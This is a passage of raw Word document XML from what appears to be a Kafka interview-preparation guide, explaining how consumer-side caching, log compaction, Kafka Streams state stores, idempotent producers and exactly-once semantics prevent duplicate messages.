          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or idempotent producers are not sufficient or feasible in your use case, you can implement deduplication at the consumer level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A634107"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC298A9" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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Consumers can maintain a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deduplication cache</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using an in-memory structure like a Set, Redis, or a database) to track processed messages based on unique message keys. Before processing a message, the consumer checks if it has already been processed by checking the cache. If the message has been processed before, it’s skipped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5067738B"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Common techniques for deduplication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC887EB" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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toring message IDs</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Deduplicate based on a unique message identifier (e.g., a combination of a Kafka key or a custom-generated message ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471315D7" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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Time-based windowing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Maintain a window of recently processed messages for a short period to check against duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4239C048"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5. Log Compaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C926891" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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Kafka provides a feature called </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that helps with deduplication, especially for use cases where the latest value for a key is important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C2576B"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A08E6B" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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In </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, Kafka ensures that only the latest value for each key is retained in the log. This helps in scenarios where the same message may be sent multiple times with the same key, but you only care about the most recent version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8483F4" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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Use case</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Log compaction is useful for maintaining a compact version of the data where duplicate messages are not a problem, and only the latest state is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C6DC63"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Kafka configuration for log compaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6901BD5F" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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et the topic configuration cleanup.policy=compact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CAC5A6"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6. Duplicate Message Detection using Kafka Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380D2681" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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In some cases, you may want to handle message duplication within a stream processing application using </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8AFB5B"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD9B065" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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Kafka Streams provides built-in functionality for </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stateful processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, where you can store previously processed message keys in a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>state store</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and check for duplicates as you process each message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3350E08B" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154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Using Kafka Streams' </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>windowing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>aggregations</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can implement deduplication logic as part of the stream processing pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C303C5" w14:textId="77777777" w:rsidR="00E62872"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E37ABB">
          <v:rect id="_x0000_i3237" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14747D27"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F1F9D0" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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o handle message duplication in Kafka effectively, you can rely on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050986B2" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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Exactly-once semantics (EOS)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for end-to-end guarantees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5980FDE1" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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Idempotent producers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prevent message duplication during retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449888D0" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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onsumer offset management</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure messages are not reprocessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC578DE" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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Log compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for retaining only the latest version of a message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BAA64D" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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onsumer-level deduplication</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using unique identifiers or caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378AC704" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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Kafka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for stream processing applications with built-in deduplication mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6201C5C9" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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hoosing the right strategy depends on your use case and the specific requirements for message delivery guarantees in your system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32443F90" w14:textId="23674B6F"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4944287">
          <v:rect id="_x0000_i3238" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F473AE5" w14:textId="6904F7A6" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00542F3A" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="809" w:name="_Toc196308289"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Discuss the techniques to prevent message duplication in Kafka and how idempotence and exactly-once semantics help with this</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="809"/>
    </w:p>
    <w:p w14:paraId="21F12D4B" w14:textId="3294E9C1" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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To prevent message duplication in Kafka, several techniques can be employed. These methods ensure that messages are not processed multiple times, either at the producer or consumer level, leading to data consistency and reliability. The most common techniques revolve around </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotence</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly-once semantics (EOS)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but other methods, such as consumer offset management and log compaction, can also play important roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C636A9E" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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Here’s a detailed discussion of the techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFDF71B"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1. Idempotent Producer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FD9A21" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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An </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent producer</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that even if a message is sent multiple times (e.g., due to network failures or retries), it will be written only once to the Kafka topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0EBD3B"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297E40B9" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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Idempotence</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is achieved by tracking message delivery using a unique </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer ID</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sequence number</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each message. Kafka guarantees that even if a producer retries a message due to temporary issues, the message will not be written to the log more than once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B85CD33" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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he producer automatically ensures that the same message (with the same producer ID and sequence number) is not written more than once to the partition, even if there are retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071E0F1F"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Kafka configuration for an idempotent producer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2736D9D3" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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nable.idempotence=true: This configuration enables idempotent producers, ensuring that the Kafka producer writes each message only once, even in the case of retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4F4B04"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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FDD0B7" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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Prevents duplication on the producer side</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This ensures that messages are not duplicated due to retries, thereby avoiding potential data inconsistencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3CC47D"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2. Exactly-Once Semantics (EOS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4AB83E" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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Exactly-once semantics (EOS)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a more advanced feature in Kafka that guarantees messages are neither lost nor duplicated throughout the entire Kafka pipeline (from producer to consumer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798AEB47"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6170EAF1" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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Producer Side</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: For EOS to work, the producer must be </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and must use </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. By assigning a unique </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transactional ID</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to each producer, Kafka tracks messages sent as part of a transaction, ensuring that they are committed or rolled back as a unit.</w:t>
      </w:r>
    </w:p>
